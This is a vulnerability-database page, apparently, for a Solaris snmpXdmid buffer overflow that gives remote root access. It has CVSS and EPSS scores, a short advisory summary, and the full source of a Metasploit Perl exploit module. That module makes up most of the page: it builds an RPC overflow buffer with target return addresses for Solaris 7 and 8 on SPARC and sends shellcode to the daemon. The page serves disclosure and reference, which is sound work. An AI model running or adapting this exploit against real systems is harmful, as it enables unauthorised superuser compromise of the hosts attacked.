CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Buffer overflow in Solaris snmpXdmid SNMP to DMI mapper daemon allows remote attackers to execute arbitrary commands via a long "indication" event.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
6.79%
–
–
2022-04-03
–
–
6.79%
–
–
2022-05-22
–
–
6.79%
–
–
2023-03-12
–
–
–
90.88%
–
2023-07-23
–
–
–
78.02%
–
2024-06-02
–
–
–
78.02%
–
2024-12-22
–
–
–
60.7%
–
2025-01-19
–
–
–
60.7%
–
2025-03-18
–
–
–
–
82.7%
2025-03-30
–
–
–
–
77.74%
2025-03-30
–
–
–
–
77.74,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
source: https://www.securityfocus.com/bid/2417/info
Versions 2.6, 7, and 8 of Sun Microsystem's Solaris operating environment ship with service called 'snmpXdmid'. This daemon is used to map SNMP management requests to DMI requests and vice versa.
SnmpXdmid contains a remotely exploitable buffer overflow vulnerability. The overflow occurs when snmpXdmid attempts to translate a 'malicious' DMI request into an SNMP trap.
SnmpXdmid runs with root privileges and any attacker to successfully exploit this vulnerability will gain superuser access immediately.
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::solaris_snmpxdmid;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use Pex::SunRPC;
use Pex::XDR;
my $advanced = { };
my $info =
{
'Name' => 'Solaris snmpXdmid AddComponent Overflow',
'Version' => '$Revision: 1.6 $',
'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
'Arch' => [ 'sparc' ],
'OS' => [ 'solaris' ],
'Priv' => 1,
'UserOpts' => {
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target RPC port', 111],
},
'Payload' => {
'Space' => 64000,
'MinNops' => 63000,
},
'Description' => Pex::Text::Freeform(qq{
Exploit based on LSD's solsparc_snmpxdmid.c. Exploit a simple overflow and
return to the heap avoiding NX stacks.
}),
'Refs' => [
['BID', 2417],
['URL', 'http://lsd-pl.net/code/SOLARIS/solsparc_snmpxdmid.c'],
],
'Targets' => [
[ 'Solaris 7 / SPARC', 0xb1868 + 96000, 0xb1868 + 32000 ],
[ 'Solaris 8 / SPARC', 0xcf2c0 + 96000, 0xcf2c0 + 32000 ],
],
'Keys' => ['snmpxdmid'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
my %data;
my $host = $self->GetVar('RHOST');
my $port = $self->GetVar('RPORT');
if(Pex::SunRPC::Clnt_create(\%data, $host, $port, 100249, 1, "tcp", "tcp") == -1)
{
$self->PrintLine("[*] RPC request failed (snmpXdmid).");
return;
}
$self->PrintLine("[*] Using port $data{'rport'}");
Pex::SunRPC::Authunix_create(\%data, "localhost", 0, 0, []);
$self->PrintLine("[*] Generating buffer...");
my $array1 =
(pack("N", ($target->[2])) x (1248/4)).
(pack("N", ($target->[1])) x (352/4)).
(pack("N", 0));
my $array2 =
(pack("N", 0) x (64000/4)).
($shellcode).
(pack("N", 0));
my @array1_tbl = map { unpack("C", $_) } split(//, $array1);
my @array2_tbl = map { unpack("C", $_) } split(//, $array2);
my $buf =
Pex::XDR::Encode_int(0).
Pex::XDR::Encode_int(0).
Pex::XDR::Encode_bool(1).
Pex::XDR::Encode_int(0).
Pex::XDR::Encode_bool(1).
Pex::XDR::Encode_varray([@array1_tbl], \&Pex::XDR::Encode_lchar).
Pex::XDR::Encode_bool(1).
Pex::XDR::Encode_varray([@array2_tbl], \&Pex::XDR::Encode_lchar).
Pex::XDR::Encode_int(0).
Pex::XDR::Encode_int(0);
$self->PrintLine("[*] Sending payload...");
if(Pex::SunRPC::Clnt_call(\%data, 0x101, $buf) == -1)
{
$self->PrintLine("[*] snmpXdmid addcomponent request failed.");
return;
}
$self->PrintLine("[*] Sent!");
return;
}